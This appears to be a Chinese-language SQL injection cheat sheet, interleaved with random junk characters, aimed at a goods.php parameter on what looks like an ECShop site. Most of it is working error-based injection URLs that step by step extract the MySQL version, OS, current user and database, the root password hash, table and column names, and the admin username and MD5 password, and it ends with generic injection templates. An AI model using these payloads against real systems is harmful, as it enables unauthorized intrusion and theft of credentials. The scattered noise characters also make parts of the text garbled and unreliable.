判断版本号 $ U+ D4 x; V6 G$ V
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
8 c. n$ ~1 I6 v$ d
- S2 V6 Z6 J% C U判断系统
& V# u7 B% q! U4 i. ~6 O% R2 I0 z8 l5 m
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 o0 e' m0 U$ A" E
3 {' N- l7 `) Q; j+ ]& d& Q& U R2 f
5 k9 z. ^: N l$ @0 a, i! H3 V" t; G4 {$ e
当前 user()( t( Z) ]1 t. K! k J" e0 @! X! k+ P6 p
: @" s1 ?7 X- W/ I% Lhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%237 i' T) n6 r. X8 S. v0 U4 z9 R2 Z& ?
. d9 T3 ~6 g! c5 C
! O8 Q2 h/ N; i T: a# o8 \
" [$ Q8 V) @( R ?& z/ K, [/ p
当前 database(); U( F5 M6 d+ B" K" b' A* M
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23* Y0 ?# F) d% u, n6 x7 n
' Y q8 y# `, I
; y; i5 R% n% s/ I" h
! x, Y c7 d+ J0 J
2 ]* ]% ~7 Q' Jroot hash4 ]& l2 Z5 F! S, ?2 G0 i
|2 a5 }8 a; |. c
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% `, T4 O! y* K* r4 B7 ~; a
! E0 r3 r3 f6 ?- ~0 q$ _- x
( Y* j. S" k/ _9 \3 V, \* s2 V
/ W+ x8 S* e0 k5 V1 k当前 数据库表名
2 q1 A& F( w( Q! ?% r. r0 E7 m- \" v6 }
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23% D" N, m3 L7 \
3 r! E% c2 P! ?( K3 X
+ l1 t `) `' }4 j5 B2 U0 ?7 x
; J* a d2 t$ r. k( E
当前 数据库 user_name 字段) b" P1 f2 n( }5 f7 w5 {8 T" K: d
" z. s" \9 h: v0 r( k7 n. y1 Ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
/ h8 k0 S, U& h6 W4 Y& q2 V* R, P- d( R# ^' @
当前 数据库 字段 password
" \- T7 ]* E( B+ q, {) V5 `http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
& |/ ^# X# L, G! E9 c$ p' y% S6 p0 m. R/ t* n! p% B# b
& P* v5 n: U9 p* b) q, T- I: a
! D0 r) [0 V% h' J$ X& e8 Y9 V获得 admin passwd(md5)( x5 w+ L1 N* p8 T+ E% n
' s r; N! {; S% }
/ H) a% M- {* N" i% Qhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
5 l& D% N( j* R8 j r! @. p8 N e( g
报错注射1 j+ a2 P1 N7 {* Y% v+ h
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
. R% p2 b7 z# J' ~6 g
( H7 v7 o: b# ~! d6 W: kSELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)5 a' `5 Q0 s$ L, z
' v- M7 z% U) ~+ ?) y4 u
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) |